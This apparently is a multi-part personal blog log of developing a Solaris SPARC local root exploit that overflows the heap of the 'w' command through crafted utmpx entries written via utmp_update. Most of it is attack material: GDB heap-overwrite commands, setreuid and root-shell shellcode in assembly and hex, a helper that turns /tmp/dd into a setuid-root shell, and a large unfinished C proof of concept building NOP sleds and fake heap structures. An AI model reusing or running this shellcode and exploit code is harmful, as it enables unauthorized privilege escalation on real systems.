Woo-Hoo. I’m finally ready to release source code :D
Bazz's Code Developments
Heap-Based Execution from UTMPX entries – Pt. 17
set *0x31488=0x00000000 # null bytes from LINE set *0x31490=0x00000000 # null bytes from LINE ## above, the parent MUST be NULL ## the first word is NULL and is OK as a chunk size. ## Below, left points to LD's thr_jmp_table - 8 bytes set *0x31498=0xff3ee260 ## this is the ut_pid ## this below is a 'special' ## I can only control the top 4 bytes of the address ## A value is written in this address + 8 ## There is a writable memory segment @ 0xff3f0000, so I use it at risk. ## This could be turned into a riskless thing by pointing it to the stack, ## and using ARGV as a way to lengthen the stack greatly, I can point ## this address into the "landing zone" created by a long ARGV ## but I'm not going to bother .. ## this 0xff3f is set by modifying utmpx: ut_exit.e_exit = 0xff3f set *0x314a0=0xff3f17a8 ### And finally the ACTUAL RETURN ADDRESS :D no +/- set *0x314a8=0xffbff090 # ut_tv.tv_usec # MUST CALL 'w' with -h to avoid smalloc # NEW LIFE # FOR GDB HEAP EXECUTION!! WOOT!! set *(0x31488-0x178)=0x00000000 set *(0x31490-0x178)=0x00000000 set *(0x31498-0x178)=0xff3de22c set *(0x314a0-0x178)=0xff3f17a8 set *(0x314a8-0x178)=0xffbef090 b t_delete
there’s only enough room in the name[32] field for 28-4 = 24 bytes of ‘authentic’ asm instructions, followed by the 8 necessary for the call / branch instruction.
What’s the difference between a call and a branch instruction.. Is it the placement of the return address into %o7, I think so. It may be possible to get 28 bytes by using some kind of annulled unconditional branch instruction. Yes, a branch always annulled or ba,a
Race Condition SHMACE ShmUh’SMISION – pt. 16
WELL WELL WELL. I’m getting the shell.. but what’s this!?! As user .. “DAEMON!??!” UID of 1 ???
I thought to myself WTF.. So I tried touching a file.. this is the code I’m using to do that:
.globl main main: ! # /bin/bash = 2f62696e 2f626173 6800 ! # /tmp/dd = 2f746d70 2f646500 set 0x2f746d70, %o0 st %o0, [%sp+84] sethi %hi(0x2f646500), %o0 st %o0, [%sp+88] !mov 0x100, %o1 mov 0x1, %o1 sll %o1, 8, %o1 !or %o1, %o0, %o0 add %sp, 84, %o0 mov 5, %g1 ! 0x5 ta 8 !ta 8 ! addition to prevent illegal instruction failure xor %o5,%o5,%o0 !add %o1,%o1,%o0 ! interprets as end of string!! even without null byte ! and o1, 2, %o0 ! exit(0) mov 1, %g1 ta 8
$ ls -l /tmp ---------- 1 root staff 0 Nov 5 21:02 dd
So I definitely have root privilege when my shellcode is executed.. So what’s the deal?? Why can’t I start a shell properly???
I have decided to copy a shell into the file /tmp/dd, which I will have my shellcode turn it into a suid root shell :)
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
main()
{
char str[] = "/tmp/dd";
// int chown(const char *path, uid_t owner, gid_t group)
chown (str, 0, 0);
// int chmod(const char *path, mode_t mode);
chmod (str, 04777);
}
x00010234 <main+0>: save %sp, -112, %sp 0x00010238 <main+4>: sethi %hi(0x17800), %g1 0x0001023c <main+8>: or %g1, 0x138, %o0 ! 0x17938 0x00010240 <main+12>: clr %o1 0x00010244 <main+16>: clr %o2 0x00010248 <main+20>: call 0x10838 <chown> 0x0001024c <main+24>: nop 0x00010250 <main+28>: sethi %hi(0x17800), %g1 0x00010254 <main+32>: or %g1, 0x138, %o0 ! 0x17938 0x00010258 <main+36>: mov 0x9ff, %o1 0x0001025c <main+40>: call 0x10814 <chmod> 0x00010260 <main+44>: nop 0x00010264 <main+48>: restore 0x00010268 <main+52>: retl 0x0001026c <main+56>: nop End of assembler dump. (gdb) disas chown Dump of assembler code for function chown: 0x00010838 <chown+0>: mov 0x10, %g1 0x0001083c <chown+4>: ta 8 0x00010840 <chown+8>: bcc 0x10854 <chown+28> 0x00010844 <chown+12>: sethi %hi(0x17000), %o5 0x00010848 <chown+16>: or %o5, 0x3c, %o5 ! 0x1703c <_cerror> 0x0001084c <chown+20>: jmp %o5 0x00010850 <chown+24>: nop 0x00010854 <chown+28>: retl 0x00010858 <chown+32>: mov %g0, %o0 End of assembler dump. (gdb) disas chmod Dump of assembler code for function chmod: 0x00010814 <chmod+0>: mov 0xf, %g1 ! 0xf 0x00010818 <chmod+4>: ta 8 0x0001081c <chmod+8>: bcc 0x10830 <chmod+28> 0x00010820 <chmod+12>: sethi %hi(0x17000), %o5 0x00010824 <chmod+16>: or %o5, 0x3c, %o5 ! 0x1703c <_cerror> 0x00010828 <chmod+20>: jmp %o5 0x0001082c <chmod+24>: nop 0x00010830 <chmod+28>: retl 0x00010834 <chmod+32>: mov %g0, %o0 End of assembler dump. (gdb)
chown/chmod /tmp/dd ASM for SC
.globl main main: ! # /tmp/dd = 2f746d70 2f646500 set 0x2f746d70, %o0 st %o0, [%sp+84] sethi %hi(0x2f646500), %o0 st %o0, [%sp+88] clr [%sp+92] !put pointer to string into $o0 add %sp,84,%o0 xor %l1, %l1, %o1 xor %l1, %l1, %o2 !call 0x10838 <chown> ! for function chown: mov 0x10, %g1 ta 8 !put pointer to string into $o0 add %sp,84,%o0 mov 0x9ff, %o1 ! call 0x10814 <chmod> ! nop mov 0xf, %g1 ! 0xf ta 8 ! addition to prevent illegal instruction failure xor %o5,%o5,%o0 !add %o1,%o1,%o0 ! interprets as end of string!! even without null byte ! and o1, 2, %o0 ! exit(0) !mov 1, %g1 add %g0, 1, %g1 ta 8
-bash-3.2$ vi opentty.c
"opentty.c" 6 lines, 64 characters
#include <fcntl.h>
main()
{
close(0);
open("/dev/tty", O_RDWR);
getchar();
}
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
"opentty.c" 8 lines, 84 characters
-bash-3.2$ gcc opentty.c
-bash-3.2$ ./a.out
l
-bash-3.2$ gcc -static opentty.c
-bash-3.2$ gdb a.out
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) disas main
Dump of assembler code for function main:
0x00010238 <main+0>: save %sp, -112, %sp
0x0001023c <main+4>: clr %o0
0x00010240 <main+8>: call 0x1234c <close>
0x00010244 <main+12>: nop
0x00010248 <main+16>: sethi %hi(0x39000), %g1
0x0001024c <main+20>: or %g1, 0x3a8, %o0 ! 0x393a8
0x00010250 <main+24>: mov 2, %o1
0x00010254 <main+28>: call 0x123b0 <open>
0x00010258 <main+32>: nop
0x0001025c <main+36>: call 0x10814 <getchar>
0x00010260 <main+40>: nop
0x00010264 <main+44>: restore
0x00010268 <main+48>: retl
0x0001026c <main+52>: nop
End of assembler dump.
(gdb) disas close
Dump of assembler code for function close:
0x0001234c <close+0>: sethi %hi(0x52400), %g1
0x00012350 <close+4>: add %g1, 0x180, %g1 ! 0x52580 <ti_jmp_table+236>
0x00012354 <close+8>: ld [ %g1 ], %g1
0x00012358 <close+12>: jmp %g1
0x0001235c <close+16>: nop
End of assembler dump.
(gdb) disas _close
Dump of assembler code for function _private_close:
0x0001776c <_private_close+0>: mov 6, %g1
0x00017770 <_private_close+4>: ta 8
0x00017774 <_private_close+8>: bcc 0x17788 <_private_close+28>
0x00017778 <_private_close+12>: sethi %hi(0x18800), %o5
0x0001777c <_private_close+16>: or %o5, 0x360, %o5 ! 0x18b60 <_cerror>
0x00017780 <_private_close+20>: jmp %o5
0x00017784 <_private_close+24>: nop
0x00017788 <_private_close+28>: retl
0x0001778c <_private_close+32>: mov %g0, %o0
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x1023c
(gdb) r
Starting program: /tmp/a.out
Breakpoint 1, 0x0001023c in main ()
(gdb) si
0x00010240 in main ()
(gdb)
0x00010244 in main ()
(gdb)
0x0001234c in close ()
(gdb)
0x00012350 in close ()
(gdb)
0x00012354 in close ()
(gdb)
0x00012358 in close ()
(gdb)
0x0001235c in close ()
(gdb)
0x0001776c in _private_close ()
(gdb) disas open
Dump of assembler code for function open:
0x000123b0 <open+0>: sethi %hi(0x52400), %g1
0x000123b4 <open+4>: add %g1, 0x194, %g1 ! 0x52594 <ti_jmp_table+256>
0x000123b8 <open+8>: ld [ %g1 ], %g1
0x000123bc <open+12>: jmp %g1
0x000123c0 <open+16>: nop
End of assembler dump.
(gdb) disas _open
Dump of assembler code for function _open:
0x000151a8 <_open+0>: save %sp, -96, %sp
0x000151ac <_open+4>: mov %i0, %o0
0x000151b0 <_open+8>: mov %i1, %o1
0x000151b4 <_open+12>: call 0x1790c <__open>
0x000151b8 <_open+16>: mov %i2, %o2
0x000151bc <_open+20>: sethi %hi(0x52800), %o1
0x000151c0 <_open+24>: ld [ %o1 + 0x1d8 ], %o1 ! 0x529d8 <__xpg4>
0x000151c4 <_open+28>: cmp %o1, 1
0x000151c8 <_open+32>: bne 0x151f8 <_open+80>
0x000151cc <_open+36>: mov %o0, %i0
0x000151d0 <_open+40>: cmp %o0, -1
0x000151d4 <_open+44>: be 0x151f8 <_open+80>
0x000151d8 <_open+48>: nop
0x000151dc <_open+52>: call 0x15258 <isptsfd>
0x000151e0 <_open+56>: nop
0x000151e4 <_open+60>: tst %o0
0x000151e8 <_open+64>: be 0x151f8 <_open+80>
0x000151ec <_open+68>: nop
0x000151f0 <_open+72>: call 0x153b4 <push_module>
0x000151f4 <_open+76>: mov %i0, %o0
0x000151f8 <_open+80>: ret
0x000151fc <_open+84>: restore
End of assembler dump.
(gdb) disas __open
Dump of assembler code for function __open:
0x0001790c <__open+0>: mov 5, %g1 ! 0x5
0x00017910 <__open+4>: ta 8
0x00017914 <__open+8>: bcc 0x17928 <__open+28>
0x00017918 <__open+12>: sethi %hi(0x18800), %o5
0x0001791c <__open+16>: or %o5, 0x360, %o5 ! 0x18b60 <_cerror>
0x00017920 <__open+20>: jmp %o5
0x00017924 <__open+24>: nop
0x00017928 <__open+28>: retl
0x0001792c <__open+32>: nop
End of assembler dump.
(gdb) b *0x00010254
Breakpoint 2 at 0x10254
(gdb) c
Continuing.
Breakpoint 2, 0x00010254 in main ()
(gdb) x/s $o0
0x393a8: "/dev/tty"
(gdb)
main()
{
setuid(7343);
system("/bin/bash");
}
Posted in Uncategorized
Race Condition Determination – Pt. 15
UP -bash-3.00$ printf "^[[A" | od -X 0000000 1b5b41 0000003 DOWN -bash-3.00$ printf "^[[B" | od -X 0000000 1b5b42 LEFT -bash-3.00$ printf "^[[D" | od -t x1 0000000 1b 5b 44 0000003 RIGHT -bash-3.00$ printf "^[[C" | od -t x1 0000000 1b 5b 43 0000003
It appears to be a blind race!?!? :[ But it is NOT so. There is a way to determine where my cool cat program IS in the race!! By adding the overflow entry as a USER_PROCESS entry, it can be determined by the output whether the insertion is happening BEFORE or AFTER the forked ‘w’ process loads all entries. If we are too early, the entry will show up in w’s output, too late and it won’t show up at all. The problem is that there is another factor — The file size of UTMPX increases by a good 0x174 * 2 bytes every test run. Meaning that the metrics are innacurate to a degree. The relation between the metrics and the filesize increase is unknown.
There are many things to do:
1) Modify program to fork a PTY, this code can be extracted from Apply-hack and will be used to provide the same master-level real-time control of variables such as UP/DOWN/LEFT/RIGHT to control sleep dials before the utmpx-entry write and exec ‘w’ .
2) It may help to add a number of processes that do nothing but chew up CPU.. Try 100 processes that do nothing but echo “DADADA” to the screen.. This can prolly be done in a bash script, no?
script.sh
#!/bin/bash while : do echo "I'm a big penis short and stout. Here is and mose and here os myplas" done
script2.sh
#!/bin/bash for (( c=1; c<=$1; c++ )) do ./script.sh & done
Posted in Uncategorized
Possible Circumvention — Pt. 14
In t_delete
/* make op the root of the tree */
if (PARENT(op))
t_splay(op);
make the parent point to another entry before in the heap…
this is a entry/shellcode starter..
entry/shellcode (pp) starter format:
SIZE(PP) is the first 8 bytes of shellcode,
which will have to jump to another entry before/after it which is more full of shellcode.. This jumping may have to occur through > 2 entries..
PARENT is NULL HOPEFULLY.. see if it can be placed in such a way that LEFT(PP) == tp [tp is the child] and PARENT is NULL.
This can be done at ut_tv.tv_sec and going downwards (see d4.c)
p[0x44] = 0xde p[0x45] = 0xad p[0x46] = 0xbe p[0x47] = 0xef p[0x48] = 0x0 p[0x49] = 0x8 p[0x4a] = 0xde p[0x4b] = 0xad p[0x4c] = 0xbe p[0x4d] = 0xef p[0x4e] = 0x0 p[0x4f] = 0x0 p[0x50] = 0xde p[0x51] = 0xad p[0x52] = 0xbe p[0x53] = 0x1f
LEFT can be assigned to TP where it says 0xdeadbeef
t_splay is called
…
…
Long story short, I figured it out. Heap-based execution is possible in this 32-bit application, I haven’t yet discovered the puzzle piece for 64-bit application. :|
I had to find an interesting way to work through the t_delete() function. I also messed with t_splay() first but it wasn’t fruitful because it overwrites a TREE structure’s size field which is a NONO. You can’t have an asm instruction for the size field because it “breaks” something about the chunk size incompatibility… So I found a crucial stage if parent == NULL && left logic (that’s summarized, not the actual liner in the code), that gets me the ability to over-write a !SIZE member of the TREE structure, exactly a place I can begin execution from..
…
.
I’ve also been working around the clock on bringing up my C-based exploit. It’s stack-execution-based. :D
Here’s a current snippet (lol)..
/* This is Bazz's PoC
of the CVE-Blah-Blah-Blah
of the w/whodo flaw!! <3
*/
#include <sys/wait.h>
// copied from w
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <ctype.h>
#include <fcntl.h>
#include <time.h>
#include <errno.h>
#include <sys/types.h>
#include <utmpx.h>
#include <sys/stat.h>
#include <dirent.h>
#include <procfs.h> /* /proc header file */
#include <locale.h>
#include <unistd.h>
#include <sys/loadavg.h>
#include <limits.h>
//
// my own includes
#include <sys/types.h>
#include <assert.h>
#define ERR (-1)
/* The program can be broken into a couple sections so far :
1) ARGV builder to w.. Builds the argument to 'w' invocation
so that there is a sweet amount of space to return to into the sack
2) UTMPX FuckING WITH SHIT!
*/
/* ARGV supplement to 'W'
# first char cannot be a number (as arg to w)
printf "AAAA"
perl -e 'print "\xa4\x1c\x40\x11\x20\xbf\xff\xff"x50000'
cat asmshell7.bin
# execute @ 0xffbee008
*/
#define COOL_NOP "\xa4\x1c\x40\x11\x20\xbf\xff\xff"
// asmshell7.bin, located only on LIFE right now
//
//
char setreuid_code[]=
"\x90\x1d\xc0\x17"
"\x92\x1d\xc0\x17"
"\x82\x10\x20\xca"
"\x91\xd0\x20\x08";
char gimme_root_shell[] =
"\x11\x0b\xd8\x9a"
"\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda\xd0\x23\xa0\x58"
"\x11\x0b\x5c\xc0\xd0\x23\xa0\x5c\xc0\x23\xa0\x60\x90\x03\xa0\x54"
"\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c\xc0\x23\xa0\x50"
"\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d\x82\x10\x20\x3b"
"\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01\x91\xd0\x20\x08";
// be global, since we'll be calling the child exec many times
// potentially, who cares
char argv_buf[(50000*8)+4+96+1]; // 96 is sizeof gimme_root_shell, 4 for "AAAA"
// this will build the argv supply and return a pointer to it :)
char * build_argv_supplement()
{
int i=0;
char *p;
bzero(argv_buf, (50000*8)+4+96+1);
p = argv_buf;
// first characters cannot be numbers so.. fill it with some A
*(p++) = 'A';
*(p++) = 'A';
*(p++) = 'A';
*(p++) = 'A';
for (i=0; i < 50000; i++)
{
strcpy(p, COOL_NOP);
p+=8;
}
strcpy (p, setreuid_code);
p += strlen(setreuid_code);
strcpy (p, gimme_root_shell);
return argv_buf;
}
/* NEED MANDATORY A STRING BUILDER TO UTMP_UPDATEE */
// To-DO
/*
Let's talk about the string builder:
/usr/lib/utmp_update `perl -e 'print "\xff\xff\xff\xf8" . "AAAA" .
"\xff\x3e\xe2\x48" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" .
"AAAA" '` `perl -e 'print "\xff\xbe\xe0\x08" '` "pts////////2" "9000"
"8" "10" "1" "100000" "10000" "4" "aa" "4" "bazz"
let's strip that into components. A lot of that perl stuff can be done
programmatically in C */
#define UTMP_UPDATE_CMD_PATH "/usr/lib/utmp_update "
#define LD_COOL_ADDR 0xff3ee248
char LD_COOL_ADDR_STR[] = "\xff\x3e\xe2\x48"; // this is it - 20
#define STACK_RETURN_ADDR "\xff\xbe\xe0\x08"
/*
Get current TTY, and use that as a component in a string builder
of the argument to utmp_update.
char *ttyname(int fildes);
Upon successful completion, ttyname() and ttyname_r() return
a pointer to a string. Otherwise, a null pointer is returned
and errno is set to indicate the error
*/
char *ttyn; // my tty name's number
// i.e. /dev/pts/2, ttyn = "2"
craft_fake_tree_utmpx_entry(struct utmpx *utp);
char * getfree_stackreturnaddr_id();
// THIS IS IMPORTANT!! <3
#define W_HEAPBUF_BASEADDR 0x30770
// This can be checked by debugging the program (copy it into home dir)
// and checking the return of malloc()
/* There are 3 different kind of UTMPX entries this program makes
1) Pre-entry -- a filler entry to ensure that the TREE struct entry
is aligned on an WORD-size boundary (8 bytes on 32-bit OS)
2) Fake TREE struct entry: 'nuff said'
Not really. This entry's ID field IS the target address,
32-bit TREE STRUCT
------------------
LL LL LL LL AA AA AA AA TP TP TP TP AA AA AA AA
FF FF FF FF AA AA AA AA AA AA AA AA AA AA AA AA
SP SP SP SP AA AA AA AA AA AA AA AA AA AA AA AA
LL : lowest 2 bits must not be set.
AA : Not important
I'm not explaining TP and SP cause I already figured it out and forgot.
See Shellcoder's Handbook.
Long story short:
TP points to LD.so function pointer and
SP points to Stack return address
3) Overflowed Heap chunk entry -- this just has some pointers back to
the fake TREE struct entry.
*/
// could be STACK SPACE, could be HEAP SPACE.. IONNO
// in this PoC it's STACK SPACE
// TREE struct ID field must be consolidated,
// create a range to consolidate against:
#define TARGET_MIN 0xffbba000
#define TARGET_MAX 0xffbeff00
// only care about multiples of 4 (each instruction is 4 bytes)
// and I want how many bytes to use so i divide by 8, a bit for every
// entry
#define STACK_TABLE_SIZE (((TARGET_MAX - TARGET_MIN) / 4) / 8)
//
//
stack_table[STACK_TABLE_SIZE]; // representing instructions entries from
// 0xffb0a000 - 0xffbeff00
#define UTMPX_ENTRY_SIZE sizeof (struct utmpx)
struct stat gstatbuf;
char *prog;
// keep track of which utmpx entries are "taken"
// every bit represents
//ie ENTRY "AAAA" = 0x41414141
// I can allocate a table space 32*32*32*32 bytes wide
// to represent all combinations of 4 bytes..
//0x01 should set bit 0 in the table//
// since the byte will be needed anyways, let's be reflecting
// 0x01 will be bit 1
// so just divide by 8 to find the byte index..
// modulus by 8 to get the bit index
//char table[32*32*32*32];
//char table[256][256][256][32];
//0x20000000 bytes = 512 MB
// DAMN TATS TOO MUCH!! Let's lower the bitspace down to save memory..
// if disregard the first byte we get 2MB size..
// how about half the bitspace..
#define UPPER_LIMIT 16
char table[UPPER_LIMIT][256][256][32];
// this table will take 32 MB.. Not bad..
/* this table reflects entries that I will use in my attack
If the UTMPX file already has certain entries.. I need to take that
into account because UTMPX never appends to the file when the entry
already exists.. but appending is necessary to overflow the heap
*/
/* if the First character of the ID is not in our bitspace, ignore it,
it is not part of the attack vector */
/* Reflects the ID[4] field
"AAAA"
look at them like address bits
but how much does each one affect the whole?
*/
#define A0 (1 << 0)
#define A1 (1 << 5) // * 32
#define A2 (1 << (5+8)) // * 32
#define A3 (1 << (5+8+8)) // * 32
/*
let's say the value is 0x00000041
0x41 / 8 = 8
0x41 % 8 = 1
table[8] |= 1 << 1
what if it was 0x00000141
*/
time_t utmpx_last_access_time=0;
static char pts_prefix[] = "pts///";
char * getfree_stackreturnaddr_id()
{
static char addr_str[5];
int i;
uint8_t bit_index;
bzero (addr_str, 5);
for (i=0; i < STACK_TABLE_SIZE; i++)
{
for (bit_index=0; bit_index < 8; bit_index++)
{
if ( (stack_table[i] & (1 << bit_index)) == 0 )
{
uint32_t free_stack_addr = TARGET_MIN + (i * 32) + (bit_index * 4) ;
uint32_t *pi = (uint32_t *)&addr_str[0];
*pi = free_stack_addr;
// mark the entry taken now on
stack_table[i] |= (1 << bit_index);
return addr_str; // its OK, addr_str is static
}
}
}
return NULL;
}
#define GENERIC_PID 9000
#define GENERIC_TYPE DEAD_PROCESS // it has to be 08.. there's nothin GENERIC ABOUT it!!
#define GENERIC_TERM 10
#define GENERIC_EXITSTATUS 1
#define GENERIC_XTIME 100000
#define GENERIC_TIME_USEC 10000
#define GENERIC_SESSION 4
#define GENERIC_PAD0 0xaaaa
#define GENERIC_PAD1 0xbbbb
#define GENERIC_PAD2 0xcccc
#define GENERIC_PAD3 0xdddd
#define GENERIC_PAD4 0xeeee
#define GENERIC_SYSLEN 4
#define GENERIC_HOST "bazz"
// static char phrase6[] = "\" \"9000\" \"8\" \"10\" \"1\" \"100000\"
// \"10000\" \"4\" \"aa\" \"4\" \"bazz\"";
assign_generics(struct utmpx *utxp)
{
char *cp;
// LINE
cp = utxp->ut_line;
strcpy (cp, pts_prefix); // global
cp += strlen(pts_prefix);
strcpy (cp, ttyn); // global
utxp->ut_pid = GENERIC_PID;
utxp->ut_type = GENERIC_TYPE;
utxp->ut_exit.e_termination = GENERIC_TERM;
utxp->ut_exit.e_exit = GENERIC_EXITSTATUS;
utxp->ut_xtime = GENERIC_XTIME;
utxp->ut_tv.tv_usec = GENERIC_TIME_USEC;
utxp->ut_session = GENERIC_SESSION;
utxp->pad[0] = GENERIC_PAD0;
utxp->pad[1] = GENERIC_PAD1;
utxp->pad[2] = GENERIC_PAD2;
utxp->pad[3] = GENERIC_PAD3;
utxp->pad[4] = GENERIC_PAD4;
utxp->ut_syslen = GENERIC_SYSLEN;
strcpy(utxp->ut_host, GENERIC_HOST);
}
craft_fake_tree_utmpx_entry(struct utmpx *utp)
{
char *free_stack_id;
char *cp; // char pointer generic
// INSPIRATION:
/*static char pts[] = "pts///";
static char phrase1[] = "/usr/lib/utmp_update `perl -e 'print \"\xff\xff\xff\xf8\" . \"AAAA\" . \"";
// phrase 2 is the LD_COOL_ADDR_STR
static char phrase3[] = "\" . \"AAAA\" . \"\xff\xff\xff\xff\" . \"AAAA\" . \"AAAA\" . \"AAAA\" '` ";
static char phrase4[] = "`perl -e 'print \"\xff\xbe\xef\x08\" '` \"pts///";
// ttynum
static char phrase6[] = "\" \"9000\" \"8\" \"10\" \"1\" \"100000\" \"10000\" \"4\" \"aa\" \"4\" \"bazz\"";*/
bzero (utp, UTMPX_ENTRY_SIZE);
// NAME
cp = utp->ut_name;
strcpy (cp, "\xff\xff\xff\xf8XXXX" );
cp += 8;
strcpy (cp, LD_COOL_ADDR_STR);
cp += strlen(LD_COOL_ADDR_STR);
strcpy (cp, "AAAA\xff\xff\xff\xffXXXXBBBBCCCC");
cp += 20;
// ID
if ( (free_stack_id = getfree_stackreturnaddr_id()) == NULL)
{
fprintf(stderr, "OUT OF FREE STACK SPACE!!?!? QUITTING\n");
exit(1);
}
strcpy (utp->ut_id, free_stack_id);
// TAKES CARE OF THE REST
assign_generics(utp);
}
utmp_update_C_style()
{
struct utmpx *utp, ut;
reset_utmpx_file_for_querying();
while ( (utp = getutxent()) != NULL );
craft_fake_tree_utmpx_entry(&ut);
}
char * string_builder_for_utmp_update_FAKE_TREE()
{
static char utmp_update_buf[2048];
// I could update UTMPX through the API
// but I'm not in that mindset!! <3
char *p;
static char pts_prefix[] = "pts///";
static char phrase1[] = "/usr/lib/utmp_update `perl -e 'print \"\xff\xff\xff\xf8\" . \"AAAA\" . \"";
// phrase 2 is the LD_COOL_ADDR_STR
static char phrase3[] = "\" . \"AAAA\" . \"\xff\xff\xff\xff\" . \"AAAA\" . \"AAAA\" . \"AAAA\" '` ";
static char phrase4[] = "`perl -e 'print \"\xff\xbe\xef\x08\" '` \"pts///";
// ttynum
static char phrase6[] = "\" \"9000\" \"8\" \"10\" \"1\" \"100000\" \"10000\" \"4\" \"aa\" \"4\" \"bazz\"";
bzero(utmp_update_buf, 2048);
p = utmp_update_buf;
strcpy(p, phrase1); // space included ;)
p += strlen(phrase1);
strcpy(p, LD_COOL_ADDR_STR);
p += strlen(LD_COOL_ADDR_STR);
strcpy(p, phrase3);
p += strlen(phrase3);
strcpy(p, phrase4);
p += strlen(phrase4);
strcpy(p, ttyn);
p += strlen(ttyn);
strcpy(p, phrase6);
///usr/lib/utmp_update `perl -e 'print "\xff\xff\xff\xf8" . "AAAA" . "\xff\x3e\xe2\x48" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" '` `perl -e 'print "\xff\xbe\xef\x08" '` "pts////////2" "9000" "8" "10" "1" "100000" "10000" "4" "aa" "4" "bazz"
// I could be all pretty RIGHT HERE, and have a TREE data structure.
// But I'm going to be RAW and not have it.
/*strcpy (p, "\xff\xff\xff\xf8XXXX");
p+= 8;
*(p++) = LD_COOL_ADDR_STR[0];
*(p++) = LD_COOL_ADDR_STR[1];
*(p++) = LD_COOL_ADDR_STR[2];
*(p++) = LD_COOL_ADDR_STR[3];
//strcpy(p, LD_COOL_ADDR);
//p+= strlen(LD_COOL_ADDR);
//int *intp = (uint32_t *) p;
//*intp = LD_COOL_ADDR;
//p+=4;
strcpy(p, "XXXX\xff\xff\xff\xff");
p+=8;*/
// This stack ADDR needs to be dynamically asserted
/* there needs to be a stack_return_addr variable
and a check in the table for an available address
don't forget tell the table it's now taken, after verifying by
searching thru the UTMPX entries (just keep 2 copies until we get NULL,
then look in the last copy for a signature) */
/**(p++) = ' ';
// ID
strcpy(p, STACK_RETURN_ADDR);
p+=4;
//
*(p++) = ' ';
strcpy(p, pts);
p+=strlen(pts);
//*(p++) = *ttyn;
strcpy (p, ttyn);
p += strlen(ttyn);
*(p++) = ' ';
//"9000"
strcpy (p, "9000 8 10 1 100000 10000 4 aa 4 bazz");*/
return utmp_update_buf;
}
// Somewhere above we will get the ID field
storeID(char *id)
{
//char buf[5];
uint8_t four,three,two,one;
uint8_t bit_index=0;
// ignore ID[0] if it's not in our range
if ((uint8_t)*id > (UPPER_LIMIT-1) )
{
// UNLESS IT'S IN THE DESIRED STACK SPACE
// how to add ID to the table
uint32_t *awesome = (uint32_t *)id;
if (*awesome >= TARGET_MIN && *awesome < TARGET_MAX)
{
*awesome -= TARGET_MIN;
if (*awesome % 4)
{
// FUCK YOU!!!
return;
}
else
{
uint32_t divider = *awesome / 32;
uint8_t bit_shift = ((*awesome % 32) / 4);
stack_table[divider] |= (1 << bit_shift);
return;
}
}
else return;
}
four = (uint8_t)*(id++);
three = (uint8_t)*(id++);
two = (uint8_t)*(id++);
one = (uint8_t)*id / 8;
bit_index = 1 << ((uint8_t)*id % 8);
table[four][three][two][one] |= bit_index;
}
//
// Function prototypes
add_pre_entry();
//
//
//
test_argv()
{
printf ("%s", build_argv_supplement());
}
uint8_t alarm_went_off=0;
mysignal(int p)
{
alarm_went_off=1;
fprintf (stderr,".");
signal(SIGALRM, mysignal);
alarm(1);
}
reset_utmpx_file_for_querying()
{
utmpxname(UTMPX_FILE);
setutxent();
}
init_table()
{
struct utmpx *p;
//don't forget to bzero @init
bzero (stack_table, STACK_TABLE_SIZE);
bzero (table, UPPER_LIMIT*256*256*32);
reset_utmpx_file_for_querying();
while ( (p = getutxent()) != NULL )
{
storeID(p->ut_id);
}
endutxent();
}
test_table()
{
signal(SIGALRM, mysignal);
//init_table();
uint16_t four=1,three=1,two=1,one=1;
uint8_t bit_index=1;
static char pc[5];
uint32_t *intp;
int i;
fprintf(stderr, "Searching the generic ID table");
alarm(1);
for (four=1; four < UPPER_LIMIT; four++)
{
for (three=1; three < 256; three++)
{
for (two=1; two < 256; two++)
{
bit_index=1;
for (one=0; one < 32; one++)
{
for (; bit_index < 8; bit_index++)
{
if (table[four][three][two][one] & (1 << bit_index))
{
alarm(0);
// found a freebie
pc[0] = four;
pc[1] = three;
pc[2] = two;
pc[3] = (one * 8) + bit_index;
pc[4] = 0;
if (alarm_went_off)
{
printf ("\n");
alarm_went_off=0;
}
if ( (!isprint(pc[0])) || (!isprint(pc[1])) ||
(!isprint(pc[2])) || (!isprint(pc[3])) )
{
intp = (uint32_t *)&pc[0];
printf ("ID: 0x%08x\n", *intp);
}
else printf ("ID: %s\n", pc);
alarm(1);
}
}
// I started with bit_index=1 to skip the NULL byte case
bit_index=0;
// when one=0
}
}
}
}
fprintf (stderr, "Now testing stack table\n");
fprintf (stderr, "ADDRESSES OCCUPIED:\n");
alarm(1);
for (i=0; i < STACK_TABLE_SIZE; i++)
{
for (bit_index=0; bit_index < 8; bit_index++)
{
if (stack_table[i] & (1 << bit_index))
{
alarm (0);
if (alarm_went_off)
{
printf ("\n");
alarm_went_off=0;
}
printf("0x%08x\n", TARGET_MIN + (i * 8 * 4) + (bit_index * 4) );
alarm(1);
}
}
}
}
test_fake_tree_string_builder()
{
char *p = string_builder_for_utmp_update_FAKE_TREE();
printf( "%s",p);
fprintf(stderr, "return code is %d\n", WEXITSTATUS(system(p)));
}
dotests()
{
char c;
fprintf(stderr, "1) Test ARGV builder\n");
fprintf(stderr, "2) Test TABLE ID Entries\n");
fprintf(stderr, "3) Test string builder for utmp_update fake tree structure\n");
fprintf(stderr, "4) Test Craft of Fake TREE UTMPX Entry\n");
scanf("%c", &c);
if (c == '1')
{
test_argv();
return 1;
}
else if (c == '2')
{
test_table();
return 1;
}
else if (c == '3')
{
test_fake_tree_string_builder();
return 1;
}
else if (c == '4')
{
struct utmpx ut;
craft_fake_tree_utmpx_entry(&ut);
// then write it !!
reset_utmpx_file_for_querying();
while ( getutxent() != NULL ); // not sure if I HAVE to do this
if ( pututxline(&ut) )
{
fprintf(stderr, "I think it was sucessful.. Do an 'od -X /var/adm/utmpx' \
to find out");
}
return 1;
}
return 0;
}
int processclargs(int argc, char *argv[])
{
int c, linecount;
